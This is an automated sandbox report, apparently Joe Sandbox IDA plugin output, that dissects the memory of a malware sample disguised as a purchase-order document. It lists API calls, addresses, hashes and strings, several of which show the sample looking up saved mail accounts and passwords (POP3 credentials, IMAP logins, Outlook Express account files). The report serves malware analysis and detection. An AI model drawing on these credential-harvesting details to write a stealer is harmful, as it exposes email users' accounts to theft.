                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                              APIs
                                                              • wcsstr.MSVCRT ref: 0040426A
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                              • strchr.MSVCRT ref: 004042F6
                                                              • strlen.MSVCRT ref: 0040430A
                                                              • sprintf.MSVCRT ref: 0040432B
                                                              • strchr.MSVCRT ref: 0040433C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                              • String ID: %s@gmail.com$www.google.com
                                                              • API String ID: 3866421160-4070641962
                                                              • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                              • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                              • API String ID: 2360744853-2229823034
                                                              • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                              • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                              APIs
                                                              • strchr.MSVCRT ref: 004100E4
                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                              • _mbscat.MSVCRT ref: 0041014D
                                                              • memset.MSVCRT ref: 00410129
                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                              • memset.MSVCRT ref: 00410171
                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                              • _mbscat.MSVCRT ref: 00410197
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                              • String ID: \systemroot
                                                              • API String ID: 912701516-1821301763
                                                              • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                              • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                              APIs
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                              • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 888011440-2039793938
                                                              • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                              • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                              APIs
                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                              • strchr.MSVCRT ref: 0040327B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringstrchr
                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                              • API String ID: 1348940319-1729847305
                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                              APIs
                                                              • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                              • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                              • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                              APIs
                                                              • memset.MSVCRT ref: 004094C8
                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                              • memset.MSVCRT ref: 0040950C
                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 3411445237-4169760276
                                                              • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                              • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                              APIs
                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                              • String ID:
                                                              • API String ID: 3642520215-0
                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                              • String ID:
                                                              • API String ID: 1999381814-0
                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                              • API String ID: 1297977491-3883738016
                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm$__aullrem
                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                              • API String ID: 643879872-978417875
                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040810E
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,7568EB20,?), ref: 004081B9
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                              • API String ID: 524865279-2190619648
                                                              • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                              • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                              • String ID: 0$6
                                                              • API String ID: 2300387033-3849865405
                                                              • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                              • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf
                                                              • String ID: %2.2X
                                                              • API String ID: 125969286-791839006
                                                              • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                              • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                              APIs
                                                                • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                              • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                              • String ID: ACD
                                                              • API String ID: 1886237854-620537770
                                                              • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                              • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                              APIs
                                                              • memset.MSVCRT ref: 004091EC
                                                              • sprintf.MSVCRT ref: 00409201
                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                              • String ID: caption$dialog_%d
                                                              • API String ID: 2923679083-4161923789
                                                              • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                              • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                              • memset.MSVCRT ref: 00410246
                                                              • memset.MSVCRT ref: 00410258
                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                              • memset.MSVCRT ref: 0041033F
                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                              • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 3974772901-0
                                                              • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                              • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0044406C
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
